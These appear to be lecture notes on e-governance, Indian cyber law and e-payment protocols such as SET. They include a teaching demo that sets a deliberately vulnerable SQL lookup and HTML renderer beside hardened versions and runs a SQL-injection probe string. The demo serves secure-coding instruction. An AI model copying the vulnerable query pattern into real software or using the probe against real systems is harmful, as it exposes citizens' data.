E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually been delivered. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government, and enhance citizens' economic and social opportunities so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is possible because of the characteristics of CORBA: it is a location-transparent, language-independent, implementation-independent and operating-system-independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service API (GSS-API). While these technologies carry considerable weight, public key security with Secure Sockets Layer (SSL) is popular for Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows:

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk, or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community (providers of goods and services) to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, enabling them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand, and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally, but not always, involving:
  - Long Term Contracts
  - User Charges and/or Payments flowing between the Parties
  - Shared Investments, but Mainly Private
  - Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves the objectives of the individual partners.

Why do them?

• Fiscal Head Room
• As a Way of Financing the Project
• Separate Policy & Regulation from Operations
• Make the Good or Service Available
• Pay for Performance and Output
• Introduce Competition - For and In the Market

The Need to Set the Right Priorities -

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps

Crafting the Partnership

Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis

What's the need?

What's driving the need (rationale)?

Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?

Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project?

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?

Master Schedule/Budget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach

Sole Source, RFP, Low Bid

Risk Allocation between Public and Private Partners

Structuring of Contract: Risks and Rewards

Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index tend to also have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites, one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS;

continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.

Authorization: the capability to grant access rights to resources; the process of verifying that someone has the rights to do what she is trying to do.

Confidentiality: the capability to prevent unauthorized access to information.

Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.

Non-repudiation: the capability to prevent the person or system involved in an event or action from denying or challenging their participation in the event.
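To show how several of those requirements fit together inside one service, here is an added Go example that is not part of the original notes or of any government system: a request handler that authenticates by session token, authorizes by role, and appends every attempt (including refusals) to a hash-chained audit log, so that each outcome stays traceable to a principal and any later edit or deletion in the log is detectable. Tokens, user names, roles and action names are constructed sample values; the Service API is this example's own.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// Session is what a valid login token maps to (authentication result).
type Session struct {
	User string
	Role string
}

// AuditEntry is one traceability record. Prev holds the previous entry's
// hash, so the entries form a chain whose integrity can be rechecked.
type AuditEntry struct {
	Actor   string
	Action  string
	Outcome string
	Prev    string
	Hash    string
}

type Service struct {
	sessions map[string]Session         // token -> session
	allow    map[string]map[string]bool // action -> roles permitted
	audit    []AuditEntry
}

func NewService() *Service {
	return &Service{
		sessions: map[string]Session{},
		allow: map[string]map[string]bool{ // constructed policy
			"view_tax_record":  {"citizen": true, "officer": true},
			"amend_tax_record": {"officer": true},
		},
	}
}

// Login registers a session token; constructed tokens are used in main.
func (s *Service) Login(token, user, role string) { s.sessions[token] = Session{user, role} }

func entryHash(actor, action, outcome, prev string) string {
	sum := sha256.Sum256([]byte(strings.Join([]string{actor, action, outcome, prev}, "\n")))
	return hex.EncodeToString(sum[:])
}

func (s *Service) record(actor, action, outcome string) {
	prev := ""
	if n := len(s.audit); n > 0 {
		prev = s.audit[n-1].Hash
	}
	s.audit = append(s.audit, AuditEntry{actor, action, outcome, prev, entryHash(actor, action, outcome, prev)})
}

// Do enforces authentication, then authorization, and records the outcome
// either way so failed attempts are as traceable as successful ones.
func (s *Service) Do(token, action string) error {
	sess, ok := s.sessions[token]
	if !ok {
		s.record("<unauthenticated>", action, "denied: no session")
		return errors.New("authentication failed")
	}
	if !s.allow[action][sess.Role] { // missing action or role reads as false
		s.record(sess.User, action, "denied: role "+sess.Role)
		return errors.New("not authorized")
	}
	s.record(sess.User, action, "ok")
	return nil
}

// VerifyAudit recomputes the chain; an edited, removed or reordered entry breaks it.
func (s *Service) VerifyAudit() bool {
	prev := ""
	for _, e := range s.audit {
		if e.Prev != prev || e.Hash != entryHash(e.Actor, e.Action, e.Outcome, e.Prev) {
			return false
		}
		prev = e.Hash
	}
	return true
}

func main() {
	svc := NewService()
	svc.Login("tok-citizen", "c.rossi", "citizen")   // constructed sessions
	svc.Login("tok-officer", "officer42", "officer")
	fmt.Println(svc.Do("tok-citizen", "view_tax_record"))
	fmt.Println(svc.Do("tok-citizen", "amend_tax_record"))
	fmt.Println(svc.Do("bogus-token", "amend_tax_record"))
	fmt.Println(svc.Do("tok-officer", "amend_tax_record"))
	fmt.Println("audit chain intact:", svc.VerifyAudit())
	svc.audit[1].Outcome = "ok" // someone later rewrites a refusal into a success
	fmt.Println("audit chain intact after edit:", svc.VerifyAudit())
}
```

The chain covers integrity and traceability as the list defines them; non-repudiation would additionally require each actor to sign their request with a key only they hold, and the head hash of the chain would have to be anchored outside the service for the check to resist an insider who can rewrite the whole log.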

Examples of organizational and technical measures to prevent unauthorized access and processing are:

• Protecting premises, equipment and systems software, including input-output units.
• Protecting software applications used to process personal data.
• Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks.
• Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.
• Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and of the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public-organization web portals.

3 INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples of cyber attacks use techniques like packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

• achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;
• maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;
• continually improve its control environment;
• effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found that 816 e-Government websites from 212 different countries were vulnerable to Cross-Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
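The two weaknesses named above, shown as a vulnerable portal lookup beside its hardened form, as an added example that is not part of the lecture notes. The citizen table, its rows and the quote-containing test input are constructed for this demonstration; the hardening (a parameterised query for the SQL side and HTML output encoding for the XSS side) is the standard defence and is an assumption of the example, not a technique the text itself prescribes.

```python
# Added example (not from the lecture notes): SQL injection and XSS, each as a
# vulnerable function beside its hardened counterpart. The citizen registry table,
# its rows and the test input are constructed for this demo.
import html
import sqlite3

CONSTRUCTED_ROWS = [
    ("alice", "Alice Example", "tax-office"),
    ("bob", "Bob Example", "registry"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database standing in for a portal's citizen table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (username TEXT, full_name TEXT, department TEXT)")
    conn.executemany("INSERT INTO citizens VALUES (?, ?, ?)", CONSTRUCTED_ROWS)
    return conn


def lookup_unsafe(conn: sqlite3.Connection, username: str) -> list:
    """VULNERABLE: user input is pasted into the SQL text, so a quote in the input
    ends the string literal and the rest of the input becomes part of the WHERE clause."""
    query = f"SELECT full_name FROM citizens WHERE username = '{username}'"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """HARDENED: a parameterised query. The value travels separately from the SQL
    text, so the input is only ever compared as data, never parsed as SQL."""
    query = "SELECT full_name FROM citizens WHERE username = ?"
    return [row[0] for row in conn.execute(query, (username,))]


def render_unsafe(full_name: str) -> str:
    """VULNERABLE: raw data interpolated into HTML, the pattern behind XSS."""
    return f"<p>Welcome, {full_name}</p>"


def render_safe(full_name: str) -> str:
    """HARDENED: HTML-escape the data before it reaches the page (output encoding),
    so markup characters in a stored name render as text instead of as tags."""
    return f"<p>Welcome, {html.escape(full_name, quote=True)}</p>"


if __name__ == "__main__":
    db = make_db()
    probe = "nobody' OR '1'='1"        # constructed test input with a quote in it
    print(lookup_unsafe(db, probe))    # the WHERE clause now matches every row
    print(lookup_safe(db, probe))      # no such user: []
    print(render_safe("<b>x</b>"))     # tags are encoded, not rendered
```

Running the block shows the difference a reviewer would look for in a code audit: the unsafe lookup returns every row for the test input, the parameterised one returns nothing, and the escaped renderer emits `&lt;b&gt;` instead of a live tag.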

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.

CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target, or a place of criminal activity, and it includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

• 121 million Internet users
• 65 million active Internet users, up by 28% from 51 million in 2010
• 50 million users shop online on e-commerce and online shopping sites
• 46+ million social network users
• 346 million mobile users had subscribed to data packages

CYBER LAW

(1) Whoever with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

• secures access;
• downloads, copies or extracts any data, computer database or any information;
• introduces or causes to be introduced any virus or contaminant;
• disrupts or causes disruption;
• denies or causes denial of access to any person;
• provides any assistance to any person to facilitate access;
• charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section 43

• Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.
• Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S66A – Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

• any information that is grossly offensive or has menacing character; or
• any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages;

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S66C – Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S66D – Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S66E – Punishment for violation of privacy

"Whoever intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S67A – Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S67C – Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."

IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce.

Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences

Section 65: Tampering with computer source documents, that is, intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years, or/and fine up to 2 lakh rupees.

Section 66: Hacking. Punishment: imprisonment up to three years, or/and fine up to 5 lakh rupees.

Section 66-A: Sending offensive messages through electronic means, that is, sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and with fine.

Criticisms

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers, because they address the issue of cyber security.

Section 69 empowers the Central Government or State Government, or its authorized agency, to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.

Smart Cards

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

(Figure: Smart card processing)

Smart Card Applications

• Ticketless travel: the Seoul bus system (4M cards, 1B transactions since 1996); planned for the SF Bay Area system
• Authentication, ID
• Medical records
• Ecash
• Store loyalty programs
• Personal profiles
• Government: licenses
• Mall parking

Credit cards

• It is a plastic card having a magnetic number and code on it.
• It has some fixed amount to spend.
• The customer has to repay the spent amount after some time.

(Figure: Processing a credit card payment)

Risks in using credit cards

• Operational risk
• Credit risk
• Legal risk

Secure Electronic Transaction (SET) Protocol

• Jointly designed by MasterCard and Visa, with the backing of Microsoft, Netscape, IBM, GTE, SAIC and others.
• Designed to provide security for card payments as they travel on the Internet.
• Contrasted with the Secure Sockets Layer (SSL) protocol, SET validates consumers and merchants in addition to providing secure transmission.

SET specification

• Uses public key cryptography and digital certificates for validating both consumers and merchants.
• Provides privacy, data integrity, user and merchant authentication, and consumer non-repudiation.

(Figure: The SET protocol)

What is a Payment Gateway?

A payment gateway is an e-commerce application service provider service that authorizes payments for e-businesses, online shopping, etc. A payment gateway protects credit card details by encrypting sensitive information such as credit card numbers, to ensure that information passes securely between the customer and the merchant, and also between the merchant and the payment processor.

(Figure: How it works)

Payments in India: Going the e-way

e-PAYMENT SYSTEM IN INDIA

• Ever-increasing technology changes
• Growing Internet access and mobile subscriber base
• Rising consumer confidence
• Convenient delivery/payment models
• India has been one of the fastest growing countries for payment cards in the Asia-Pacific region
• India currently has approximately 130 million cards (both debit and credit) in circulation

(Figure: Growth in e-payment system)

REGULATION

The Reserve Bank of India (RBI) has been supportive in the development of electronic payments. In this direction, the "Payments and Settlement System Act" was enacted. Apart from being supportive, the RBI has also initiated various programs to encourage e-payments.

CHANNELS OF PAYMENT

Indian banks have put in place various channels of electronic payments to encourage customers to adopt the electronic mode. Channels like the Internet, mobile, ATMs and drop boxes are some of the most frequently used channels, apart from bank branches.

MARKET MAPPING

The e-payments processing market has two major players, namely Tech Process and Bill Desk, which is a pure-play electronic transaction processing company.

The Indian payment system is transforming from paper mode to electronic mode. Two main reasons for such a shift are:

1. The regulator has mandated routing all high-value transactions electronically to minimize movement of money and risk.
2. At the retail end, customers are realizing the efficiency of electronic payments.

(Figure: Shifts in the payment system)

TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT

• Electronic Clearing Service (Credit and Debit)
• National Electronic Fund Transfer (NEFT)

THE RULING PLASTIC MONEY

• Credit cards
• Debit cards
• ATM cards

PayPal

PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods such as checks and money orders. It is subject to the US economic sanctions list and other rules and interventions required by US laws or government. PayPal is an acquirer, performing payment processing for online vendors, auction sites and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States, at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Scottsdale, Charlotte and Austin in the United States; Chennai in India; Dublin in Ireland; Kleinmachnow in Germany; and Tel Aviv in Israel. From July 2007, PayPal has operated across the European Union as a Luxembourg-based bank.

Google Wallet

Google Wallet was launched in 2011, serving a similar function as PayPal to facilitate payments and transfer money online. It also features highly robust security and additional features such as the ability to send payments as attachments via email.

CHARACTERISTICS OF PAYMENT SYSTEM

• There is no paper involved, so electronic payments can be effected directly from home or office.
• Fast, efficient, safe, secure and generally less costly than paper-based alternatives, e.g. cheques.
• Electronic payments are fully traceable.
• In Ireland, the clearing time for standard electronic payments is next-day value for interbank transfers, subject to the payment instruction being received ahead of 'shut-off' times, which can vary from bank to bank. Payment instructions received after the 'shut-off' time will be processed one working day later.
• Most banks offer same-day value for payments made to other accounts held in that same bank.
• Many banks offer same-day money transfer inter-bank services for large value payments.
• Unlike cheques, electronic payments don't 'bounce', as payments will not be effected unless the funds are available in the first place.

Features of Payment Methods

• Anonymity: whether the payment method is anonymous
• Security: whether the payment method is secure
• Overhead cost: the overhead cost of processing a payment
• Transferability: whether a payment can be carried out without the involvement of a third party
• Divisibility: whether a payment can be divided into arbitrarily small payments whose sum is equal to the original payment
• Acceptability: whether the payment method is supported globally

4C PAYMENT METHODS

To make the e-commerce system functional, we also need to incorporate payment functions into the system. In the physical world there are 4 types of payment methods:

• Cash
• Credit card
• Check
• Credit/debit (fund transfer)

A payment method should be:

• very secure
• of low overhead cost
• transferable
• acceptable anywhere
• divisible
• anonymous

(Figure: Comparison of the 4C payment methods)

SET PROTOCOL FOR CREDIT CARD PAYMENT

• The credit card is one of the most commonly used payment methods in e-commerce, in particular B2C e-commerce.
• Before the introduction of the SET protocol, secure credit card payment was usually carried out over an SSL connection.

Advantage of SSL

• It ensures the secure transmission of credit card information over the Internet.

Disadvantage of SSL

• It is not a complete credit card payment method.
• For example, it cannot support on-line credit card authorization.

SET is specially developed to provide secure credit card payment over the Internet. It is now widely supported by major credit card companies, including Visa and MasterCard.

• SET aims at satisfying the following security requirements in the context of credit card payment:
  – Confidentiality: sensitive messages are encrypted so that they are kept confidential.
  – Integrity: nearly all messages are digitally signed to ensure content integrity.
  – Authentication: authentication is performed through a public key infrastructure.

SET network architecture

• Merchant: a seller which is connected to an acquirer.
• Cardholder: a registered holder of the credit card, who is a buyer.
• Issuer: the bank that issues the credit card to a cardholder.
• Acquirer: the bank that serves as an "agent" to link a merchant to multiple issuers. A merchant can process various credit cards through a single acquirer.
• Payment Gateway: this is typically connected to the acquirer. The payment gateway is situated between the SET system and the financial network of the current credit card system for processing the credit card payment.

(Figure: SET digital certificate system)

Dual signature generation and verification

• In the physical credit card system:
  – the Payment Instructions (PI), including the cardholder's credit card number and signature, are not kept confidential;
  – data integrity can basically be ensured by using printed receipts;
  – the cardholder's authentication relies on simple signature checking only.
• In an electronic credit card system:
  – the Order Information (OI) and PI can be digitally signed to ensure data integrity;
  – the sensitive credit card information may still be disclosed to other people.
• SET introduces a novel method called the dual signature (DS) to ensure data integrity while protecting the sensitive information.

How the merchant and the payment gateway can verify the DS

• The merchant is provided with OI, H[PI] and DS.
• The dual signature can be verified as follows:

Step 1: The merchant first computes H[ H[PI] || H[OI] ].

Step 2: He then decrypts the digital signature with the cardholder's public signature key, as follows:

  D_RSA[ DS | key_public_sign,cardholder ]

where key_public_sign,cardholder is the public signature key of the cardholder.

Step 3: Finally, he compares the two terms H[ H[PI] || H[OI] ] and D_RSA[ DS | key_public_sign,cardholder ]. They should be the same if the transmitted DS has not been changed; otherwise the order is not valid.

• The payment gateway is provided with PI, H[OI] and DS, and verifies in the same way using H[OI] and its own H[PI].
• By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party.
• If either the OI or PI is changed, the dual signature will no longer be valid.

DIGITAL ENVELOPE

(Figure: Digital envelope)

SET PROTOCOL

The SET protocol has four phases: initiation, purchase, authorization and capture.

• First, the cardholder sends a purchase initiation request to the merchant for initializing the payment. Then the merchant returns a response message to the cardholder.
• In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.
• In the third phase, the merchant obtains the authorization from the issuer via the payment gateway.
• Finally, the merchant requests a money transfer to its account.
